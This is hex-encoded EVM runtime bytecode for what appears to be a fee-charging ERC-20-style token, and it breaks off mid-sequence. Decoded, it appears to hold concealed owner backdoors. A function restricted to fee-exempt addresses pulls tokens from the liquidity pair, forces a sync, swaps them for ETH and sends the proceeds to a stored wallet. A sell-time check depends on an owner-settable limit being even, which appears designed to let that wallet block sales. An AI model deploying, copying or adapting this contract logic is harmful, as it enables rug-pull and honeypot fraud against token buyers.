0x60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cfa565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613db5565b610d3f565b6040516103899190613e10565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e2b565b610d5d565b6040516103c69190613e10565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eb7565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ee1565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e2b565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ee1565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ee1565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613efc565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f29565b610fcb565b6040516105019190613e10565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f98565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613db5565b6110ad565b6040516105699190613e10565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fc2565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e10565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e2b565b611199565b6040516105fc9190613e10565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ee1565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e10565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e2b565b611208565b60405161068f9190613ee1565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e10565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614009565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fc2565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ee1565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614049565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fc2565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fc2565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ee1565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cfa565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614009565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ee1565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ee1565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e6919061409c565b611a37565b6040516108f89190613e10565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ee1565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613db5565b611bc9565b6040516109609190613e10565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613db5565b611c96565b60405161099d9190613e10565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e2b565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e2b565b611e0b565b604051610a039190613e10565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e10565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614009565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614049565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613efc565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e10565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ee1565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613efc565b6121db565b604051610b3c9190613e10565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ee1565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140dc565b612351565b604051610ba49190613ee1565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ee1565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e10565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ee1565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e2b565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ee1565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ee1565b60405180910390f35b606060038054610cbc9061414b565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce89061414b565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141c8565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f9190614246565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e9565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151ee60289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141c8565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141c8565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141c8565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614309565b61164a9190614309565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d906143ab565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141c8565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a90614417565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e10565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b6060600480546118739061414b565b80601f016020809104026020016040519081016040528092919081815260200182805461189f9061414b565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141c8565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a14906144a9565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad69190614246565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f90614515565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b7290614566565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016152166025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141c8565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141c8565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e10565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141c8565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614309565b6120479190614309565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a906145c7565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141c8565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145e7565b6121599190614246565b6121639190614246565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c906146b3565b60405180910390fd5b670de0b6b3a7640000816121b991906145e7565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141c8565b60405180910390fd5b620186a06001612282610da3565b61228c91906145e7565b6122969190614246565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf90614745565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145e7565b6122f99190614246565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147d7565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141c8565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c90614869565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614309565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148d5565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d90614967565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149f9565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ee1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614b1d565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b89565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614c1b565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614cad565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145e7565b6130879190614246565b601960008282546130989190614309565b92505081905550601454601754826130b091906145e7565b6130ba9190614246565b601a60008282546130cb9190614309565b92505081905550601454601554826130e391906145e7565b6130ed9190614246565b601860008282546130fe9190614309565b9250508190555060006002600a546131169190614ccd565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d70565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145e7565b6132009190614246565b601960008282546132119190614309565b925050819055506010546013548261322991906145e7565b6132339190614246565b601a60008282546132449190614309565b925050819055506010546011548261325c91906145e7565b6132669190614246565b601860008282546132779190614309565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d90565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cfa565b60405180910390fd5b50600083856133109190614d90565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ef7565b8461342191906145e7565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f42565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614fb5565b816001815181106135ed576135ec614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150db565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614b1d565b60405180910390fd5b6137d7838383613baf565b613842816040518060600160405280602681526020016151c8602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ee1565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614309565b6139ad9190614309565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145e7565b8311156139f4576014600b546139f191906145e7565b92505b600060028360195486613a0791906145e7565b613a119190614246565b613a1b9190614246565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b90614566565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145e7565b9050828482613b1a9190614246565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b51906151a7565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cfa565b60405180910390fd5b5060008385613c549190614246565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b83811115613caa576000848401525b50505050565b6000601f19601f8301169050919050565b6000613ccc82613c61565b613cd68185613c6c565b9350613ce6818560208601613c7d565b613cef81613cb0565b840191505092915050565b60006020820190508181036000830152613d148184613cc1565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4c82613d21565b9050919050565b613d5c81613d41565b8114613d6757600080fd5b50565b600081359050613d7981613d53565b92915050565b6000819050919050565b613d9281613d7f565b8114613d9d57600080fd5b50565b600081359050613daf81613d89565b92915050565b60008060408385031215613dcc57613dcb613d1c565b5b6000613dda85828601613d6a565b9250506020613deb85828601613da0565b9150509250929050565b60008115159050919050565b613e0a81613df5565b82525050565b6000602082019050613e256000830184613e01565b92915050565b600060208284031215613e4157613e40613d1c565b5b6000613e4f84828501613d6a565b91505092915050565b6000819050919050565b6000613e7d613e78613e7384613d21565b613e58565b613d21565b9050919050565b6000613e8f82613e62565b9050919050565b6000613ea182613e84565b9050919050565b613eb181613e96565b82525050565b6000602082019050613ecc6000830184613ea8565b92915050565b613edb81613d7f565b82525050565b6000602082019050613ef66000830184613ed2565b92915050565b600060208284031215613f1257613f11613d1c565b5b6000613f2084828501613da0565b91505092915050565b600080600060608486031215613f4257613f41613d1c565b5b6000613f5086828701613d6a565b9350506020613f6186828701613d6a565b9250506040613f7286828701613da0565b9150509250925092565b600060ff82169050919050565b613f9281613f7c565b82525050565b6000602082019050613fad6000830184613f89565b92915050565b613fbc81613d41565b82525050565b6000602082019050613fd76000830184613fb3565b92915050565b613fe681613df5565b8114613ff157600080fd5b50565b6